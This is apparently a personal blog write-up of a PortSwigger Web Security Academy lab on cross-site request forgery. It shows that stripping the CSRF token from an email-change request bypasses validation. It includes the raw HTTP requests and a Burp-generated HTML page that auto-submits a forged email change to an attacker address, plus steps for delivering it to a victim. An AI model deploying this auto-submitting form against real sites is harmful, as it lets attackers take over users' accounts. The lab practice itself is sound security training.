Skip to content

chojnowski.it

CSRF where token validation depends on token being

CSRF where token validation depends on token being

CSRF where token validation depends on token being present¶

Solution¶

L: wiener
P: peter

Sent a normal request¶

POST /my-account/change-email HTTP/2
Host: 0ac8003204cf04b48135433700410001.web-security-academy.net
Cookie: session=LX8trv5CTQgOyahyHq5F1qV8B0VxVxwr
Content-Length: 69
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0ac8003204cf04b48135433700410001.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0ac8003204cf04b48135433700410001.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

email=wiener1%40normal-user.net&csrf=QXikz0iKb5jQ3ZOGhxNQ0tFxepxWubcZ

Edit request (delete CSRF token)¶

Delete &csrf=QXikz0iKb5jQ3ZOGhxNQ0tFxepxWubcZ from POST request
---
Payload

POST /my-account/change-email HTTP/2
Host: 0ac8003204cf04b48135433700410001.web-security-academy.net
Cookie: session=LX8trv5CTQgOyahyHq5F1qV8B0VxVxwr
Content-Length: 31
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="131", "Not_A Brand";v="24"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Accept-Language: en-US,en;q=0.9
Origin: https://0ac8003204cf04b48135433700410001.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.140 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://0ac8003204cf04b48135433700410001.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Priority: u=0, i

email=wiener2%40normal-user.net

Generate CSRF PoC¶

right-click on the request and select Engagement tools / Generate CSRF PoC
---
Payload
___

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ac8003204cf04b48135433700410001.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacker&#64;hacker&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Copy and paste CSRF¶

Copy and paste payload to Body section (Exploit server) and click "Store" and "View explit" and "Delivery exploit to victim"
---
Payload
___
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="https://0ac8003204cf04b48135433700410001.web-security-academy.net/my-account/change-email" method="POST">
      <input type="hidden" name="email" value="hacker&#64;hacker&#45;user&#46;net" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>